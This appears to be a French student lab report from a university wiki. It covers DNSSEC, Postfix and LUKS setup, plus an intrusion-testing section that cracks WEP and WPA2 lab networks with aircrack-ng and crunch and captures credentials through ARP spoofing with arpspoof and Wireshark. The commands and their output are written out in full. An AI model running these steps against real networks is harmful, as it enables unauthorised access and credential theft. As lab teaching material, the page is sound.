Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|200px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Reception_messages_mirage.png&amp;diff=53931</id>
		<title>Fichier:Reception messages mirage.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Reception_messages_mirage.png&amp;diff=53931"/>
				<updated>2020-11-20T08:19:58Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53930</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53930"/>
				<updated>2020-11-20T08:16:11Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
